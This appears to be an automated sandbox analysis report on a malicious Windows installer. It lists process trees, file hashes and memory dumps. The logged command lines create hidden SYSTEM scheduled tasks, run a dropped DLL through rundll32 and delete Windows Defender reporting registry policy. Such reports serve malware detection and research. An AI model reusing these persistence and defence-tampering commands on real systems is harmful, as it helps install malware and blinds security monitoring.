- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FCAPlZuTAsqwUyW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FCAPlZuTAsqwUyW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwAFpYAhGjMvtv" /F /xml "C:\Program Files (x86)\ftljgLlqPYjU2\hERXrer.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "McuOLUVUlugVY2" /F /xml "C:\ProgramData\jxOPGMlVxWbacrVB\ZSUJJCh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xLmVYQFXqdUlrpoGi2" /F /xml "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\biUkkKO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UgCFryohpROslohYHbe2" /F /xml "C:\Program Files (x86)\FsFQcVpRNSNUC\ywTIhSy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GltAVngPgjmuayZGp" /SC once /ST 00:53:33 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\THZROCWpyYwmtzQt\bqXTtgxM\qpQDERg.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GltAVngPgjmuayZGp"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RVtwMREJXQsvxhCBJ"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\THZROCWpyYwmtzQt\bqXTtgxM\qpQDERg.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\THZROCWpyYwmtzQt\bqXTtgxM\qpQDERg.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GltAVngPgjmuayZGp"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\biUkkKO.xmlFilesize
2KB
MD526a058539a07a7192d183a543ee85685
SHA1d48358886708a3cefde3b2b13d9f9fe13ed46a1f
SHA256d3704bff1fdb6b8d32708f803baf6cad1beda88f3af316ec6b9df4f4e4eaf562
SHA512b482004f35ddda26d08cf18ace9c21db05959e274fb16f3e932349a012aa1921b96455fd2a23793edbe67b2be211745fac9028614485a1ee51b6fd7c62402ec0
-
C:\Program Files (x86)\FsFQcVpRNSNUC\ywTIhSy.xmlFilesize
2KB
MD55a79de8082e39d65f8e4a9e79530f51b
SHA135a8ce95ef51a4015fb8aca95608d0163fee9bb4
SHA25683f5bbcec41b542c38bc345c8303257057c07f74bbde1b0ce0b3e36072ef9b0d
SHA5120a3dd1a64361d0596b73ccae9a93356c711eed740c4765d076b1a5f19f993e492140161909e1c6666b878508a729d0ea9ca0d286fc3b29b1de91231cdb4af371
-
C:\Program Files (x86)\ftljgLlqPYjU2\hERXrer.xmlFilesize
2KB
MD58ca96f2ec23876c7fdd23aa09ec18524
SHA177150e3de6126fb9dfae26687dc413eb9af62ad4
SHA2564e75e1c6e79b77cc3d3872b110f7150125b55e5478531fac066f285a4e435a40
SHA512ead915a004c50a3f642ce8e5748679427304e71e3a64d224d3cd0edcc143cfb9650581e6c0b35ef0807f1699bfc58c81753ee5d3858ed9862e5f06057080d588
-
C:\Program Files (x86)\gtYbQvtxU\Gyrowbh.xmlFilesize
2KB
MD5e3a0642278ec94f9a4a332d81e9cc8b6
SHA11ccadba80c7ed6cddb317f1dc3a0508ed2540474
SHA2567b18134617b51ae24a9caa15c481d967cd77212fb57af7b8de8b0aecc6841305
SHA51258dbba36f713fa2249c2e3fcd1caabef01ac57eafee72c99e8192884e0449974ecf6ed9654bb65f6e9ed3ce16a24c0d6dcd5d59ade5c098e34b6a7f5260681a5
-
C:\ProgramData\jxOPGMlVxWbacrVB\ZSUJJCh.xmlFilesize
2KB
MD5a64147b1707a764e1a102f1e6b5337cf
SHA1f6daaea808535d3e668789ccb1bed4cf722bd242
SHA256d0ebdfbf6ee198690332b7ee9ec95410c09fc4d50faed7e8af1d68190e70792e
SHA512dbfd9a824091463c093615fb25107993803016cbee2b54cb92a8e954dfeac51760a68a4fcefe7d3994dd76ce6d6736e603e32394077640b05e365edcc51a7f1c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
C:\Users\Admin\AppData\Local\Temp\7zS74B8.tmp\Install.exeFilesize
6.3MB
MD539ea84158ca066fcc314674f7b10156e
SHA1023f208d6e58b70c227497bb14c3837a0ac98bf3
SHA25676b0ace644b7879bf07e25f303b98962c565f2d201e4a3f1e6f93f6d8a5f2439
SHA512d82561be55e6bcdd97f4e59dde15d8aa32fb76c959802d984bc9f14d070184028077f97914eb8c7922956035b70c523e5dd81923672025770135745a01f0efba
-
C:\Users\Admin\AppData\Local\Temp\7zS74B8.tmp\Install.exeFilesize
6.3MB
MD539ea84158ca066fcc314674f7b10156e
SHA1023f208d6e58b70c227497bb14c3837a0ac98bf3
SHA25676b0ace644b7879bf07e25f303b98962c565f2d201e4a3f1e6f93f6d8a5f2439
SHA512d82561be55e6bcdd97f4e59dde15d8aa32fb76c959802d984bc9f14d070184028077f97914eb8c7922956035b70c523e5dd81923672025770135745a01f0efba
-
C:\Users\Admin\AppData\Local\Temp\7zS7777.tmp\Install.exeFilesize
6.7MB
MD5735c4a9975bd16230ccf1c3b786e14f3
SHA1242afecf0ee02af12b80a903bf054248f3f876d7
SHA256621c1dc3a9e105be207d54ac9691975b992b199f7c7f79949740dfda8a4290f1
SHA512ece9c21d6d05b950b032f55508e555dc5e4529e73bce3e5ab00f1e1fb2f82c8a9a48b1822c4f8d39e68a2ac7e1b4819daf58c5d7fde25dc9514ca1caa9a4b681
-
C:\Users\Admin\AppData\Local\Temp\7zS7777.tmp\Install.exeFilesize
6.7MB
MD5735c4a9975bd16230ccf1c3b786e14f3
SHA1242afecf0ee02af12b80a903bf054248f3f876d7
SHA256621c1dc3a9e105be207d54ac9691975b992b199f7c7f79949740dfda8a4290f1
SHA512ece9c21d6d05b950b032f55508e555dc5e4529e73bce3e5ab00f1e1fb2f82c8a9a48b1822c4f8d39e68a2ac7e1b4819daf58c5d7fde25dc9514ca1caa9a4b681
-
C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\AklpEYo.exeFilesize
6.7MB
MD5735c4a9975bd16230ccf1c3b786e14f3
SHA1242afecf0ee02af12b80a903bf054248f3f876d7
SHA256621c1dc3a9e105be207d54ac9691975b992b199f7c7f79949740dfda8a4290f1
SHA512ece9c21d6d05b950b032f55508e555dc5e4529e73bce3e5ab00f1e1fb2f82c8a9a48b1822c4f8d39e68a2ac7e1b4819daf58c5d7fde25dc9514ca1caa9a4b681
-
C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\AklpEYo.exeFilesize
6.7MB
MD5735c4a9975bd16230ccf1c3b786e14f3
SHA1242afecf0ee02af12b80a903bf054248f3f876d7
SHA256621c1dc3a9e105be207d54ac9691975b992b199f7c7f79949740dfda8a4290f1
SHA512ece9c21d6d05b950b032f55508e555dc5e4529e73bce3e5ab00f1e1fb2f82c8a9a48b1822c4f8d39e68a2ac7e1b4819daf58c5d7fde25dc9514ca1caa9a4b681
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD548aadcb6fa3d681726966c5733668c3f
SHA1870def7719b97f63d90ac5e70d2375b9f9f5c6c7
SHA2569c6b9aefa9d4fe42df41e3c096f6f180c6eab24f5f9ec7579f46dc2a0b6da4f3
SHA5127f88f834e02c3748d2e93c57899fb9172dbd24ebe94d38c09a4f64a32d588d09803d32ce08c2f771e00fb019ffc3122ad49ef4fc6ef064eaef6c4d31e3ed8cbe
-
C:\Windows\Temp\THZROCWpyYwmtzQt\bqXTtgxM\qpQDERg.dllFilesize
6.2MB
MD5b120fd9e364479c5228025744cfdbb5f
SHA1103413d20d8e12657866fe6ea4307380ee459dad
SHA2564bbb34c69dc1804cae0502d7cfbf4ed026594c75961c22bd739698499ceb2488
SHA512216f31fc30c6682d35bd2ca097ce727d7b68c56219401ab7b7ed880bdbe789f0612cbb06b8a24f24ab4ee5aa4efcc637a7992cd4cc502f76eb6a9e5c492e95b6
-
C:\Windows\Temp\THZROCWpyYwmtzQt\bqXTtgxM\qpQDERg.dllFilesize
6.2MB
MD5b120fd9e364479c5228025744cfdbb5f
SHA1103413d20d8e12657866fe6ea4307380ee459dad
SHA2564bbb34c69dc1804cae0502d7cfbf4ed026594c75961c22bd739698499ceb2488
SHA512216f31fc30c6682d35bd2ca097ce727d7b68c56219401ab7b7ed880bdbe789f0612cbb06b8a24f24ab4ee5aa4efcc637a7992cd4cc502f76eb6a9e5c492e95b6
-
C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\arOmmdb.exeFilesize
6.7MB
MD5735c4a9975bd16230ccf1c3b786e14f3
SHA1242afecf0ee02af12b80a903bf054248f3f876d7
SHA256621c1dc3a9e105be207d54ac9691975b992b199f7c7f79949740dfda8a4290f1
SHA512ece9c21d6d05b950b032f55508e555dc5e4529e73bce3e5ab00f1e1fb2f82c8a9a48b1822c4f8d39e68a2ac7e1b4819daf58c5d7fde25dc9514ca1caa9a4b681
-
C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\arOmmdb.exeFilesize
6.7MB
MD5735c4a9975bd16230ccf1c3b786e14f3
SHA1242afecf0ee02af12b80a903bf054248f3f876d7
SHA256621c1dc3a9e105be207d54ac9691975b992b199f7c7f79949740dfda8a4290f1
SHA512ece9c21d6d05b950b032f55508e555dc5e4529e73bce3e5ab00f1e1fb2f82c8a9a48b1822c4f8d39e68a2ac7e1b4819daf58c5d7fde25dc9514ca1caa9a4b681
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD5bfc45a8e903baf38f39f8f547db4d172
SHA187023a037445aab7ca99c71543156421c22552b4
SHA256b03a79ffa7ab8260bfb1d2d99c3c2b8a992baaa90115fcd64d36e5faf1e68d12
SHA5129610e4cb54f22b260aefa57a7ec7fe02c8b65f0d11b954d23d46217838a352651a1773901ef5b2a599764fe5a65c818732f45c40ed770fa7824210ce0c9aaf52
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/220-194-0x0000000000000000-mapping.dmp
-
memory/332-216-0x0000000000000000-mapping.dmp
-
memory/544-176-0x0000000000000000-mapping.dmp
-
memory/608-147-0x0000000000000000-mapping.dmp
-
memory/776-197-0x0000000000000000-mapping.dmp
-
memory/856-132-0x0000000000000000-mapping.dmp
-
memory/944-149-0x0000000000000000-mapping.dmp
-
memory/1052-170-0x0000000000000000-mapping.dmp
-
memory/1096-203-0x0000000000000000-mapping.dmp
-
memory/1132-204-0x0000000000000000-mapping.dmp
-
memory/1192-192-0x0000000000000000-mapping.dmp
-
memory/1216-181-0x0000000000000000-mapping.dmp
-
memory/1320-174-0x0000000000000000-mapping.dmp
-
memory/1356-148-0x0000000000000000-mapping.dmp
-
memory/1440-191-0x0000000000000000-mapping.dmp
-
memory/1444-171-0x0000000000000000-mapping.dmp
-
memory/1532-172-0x0000000000000000-mapping.dmp
-
memory/1540-185-0x0000000000000000-mapping.dmp
-
memory/1932-177-0x0000000000000000-mapping.dmp
-
memory/2032-169-0x0000000000000000-mapping.dmp
-
memory/2148-143-0x0000000000000000-mapping.dmp
-
memory/2148-186-0x0000000000000000-mapping.dmp
-
memory/2232-173-0x0000000000000000-mapping.dmp
-
memory/2252-223-0x0000000000000000-mapping.dmp
-
memory/2252-208-0x0000000000000000-mapping.dmp
-
memory/2256-209-0x0000000000000000-mapping.dmp
-
memory/2408-199-0x0000000000000000-mapping.dmp
-
memory/2732-215-0x0000000000000000-mapping.dmp
-
memory/2992-156-0x0000000000000000-mapping.dmp
-
memory/3036-200-0x0000000000000000-mapping.dmp
-
memory/3212-168-0x0000000005280000-0x000000000529E000-memory.dmpFilesize
120KB
-
memory/3212-166-0x0000000004AC0000-0x0000000004B26000-memory.dmpFilesize
408KB
-
memory/3212-165-0x00000000042B0000-0x00000000042D2000-memory.dmpFilesize
136KB
-
memory/3212-162-0x0000000000000000-mapping.dmp
-
memory/3212-167-0x0000000004C20000-0x0000000004C86000-memory.dmpFilesize
408KB
-
memory/3212-163-0x0000000003D10000-0x0000000003D46000-memory.dmpFilesize
216KB
-
memory/3212-164-0x0000000004490000-0x0000000004AB8000-memory.dmpFilesize
6.2MB
-
memory/3232-250-0x0000000002A80000-0x0000000003A80000-memory.dmpFilesize
16.0MB
-
memory/3352-201-0x0000000000000000-mapping.dmp
-
memory/3392-138-0x0000000010000000-0x0000000011000000-memory.dmpFilesize
16.0MB
-
memory/3392-135-0x0000000000000000-mapping.dmp
-
memory/3468-219-0x000001F8131F0000-0x000001F813CB1000-memory.dmpFilesize
10.8MB
-
memory/3468-221-0x000001F8131F0000-0x000001F813CB1000-memory.dmpFilesize
10.8MB
-
memory/3488-211-0x0000000000000000-mapping.dmp
-
memory/3532-144-0x0000000000000000-mapping.dmp
-
memory/3544-207-0x0000000000000000-mapping.dmp
-
memory/3560-180-0x0000000000000000-mapping.dmp
-
memory/3728-206-0x0000000000000000-mapping.dmp
-
memory/3928-188-0x0000000000000000-mapping.dmp
-
memory/4052-178-0x0000000000000000-mapping.dmp
-
memory/4084-222-0x0000000000000000-mapping.dmp
-
memory/4164-247-0x0000000004990000-0x0000000004A4C000-memory.dmpFilesize
752KB
-
memory/4164-243-0x0000000004910000-0x0000000004989000-memory.dmpFilesize
484KB
-
memory/4164-233-0x00000000041F0000-0x0000000004258000-memory.dmpFilesize
416KB
-
memory/4164-213-0x0000000000000000-mapping.dmp
-
memory/4164-229-0x0000000003AE0000-0x0000000003B65000-memory.dmpFilesize
532KB
-
memory/4176-179-0x0000000000000000-mapping.dmp
-
memory/4284-220-0x0000000000000000-mapping.dmp
-
memory/4324-150-0x0000000000000000-mapping.dmp
-
memory/4372-198-0x0000000000000000-mapping.dmp
-
memory/4392-151-0x0000023975CF0000-0x0000023975D12000-memory.dmpFilesize
136KB
-
memory/4392-152-0x00007FFC65DD0000-0x00007FFC66891000-memory.dmpFilesize
10.8MB
-
memory/4392-154-0x00007FFC65DD0000-0x00007FFC66891000-memory.dmpFilesize
10.8MB
-
memory/4528-193-0x0000000000000000-mapping.dmp
-
memory/4632-210-0x0000000000000000-mapping.dmp
-
memory/4684-187-0x0000000000000000-mapping.dmp
-
memory/4716-142-0x0000000000000000-mapping.dmp
-
memory/4724-145-0x0000000000000000-mapping.dmp
-
memory/4732-146-0x0000000000000000-mapping.dmp
-
memory/4756-202-0x0000000000000000-mapping.dmp
-
memory/4856-190-0x0000000000000000-mapping.dmp
-
memory/4904-141-0x0000000000000000-mapping.dmp
-
memory/4968-175-0x0000000000000000-mapping.dmp
-
memory/4972-212-0x0000000000000000-mapping.dmp
-
memory/4976-183-0x0000000000000000-mapping.dmp
-
memory/5024-205-0x0000000000000000-mapping.dmp
-
memory/5028-184-0x0000000000000000-mapping.dmp
-
memory/5056-182-0x0000000000000000-mapping.dmp
-
memory/5064-155-0x0000000000000000-mapping.dmp
-
memory/5076-153-0x0000000000000000-mapping.dmp
-
memory/5100-189-0x0000000000000000-mapping.dmp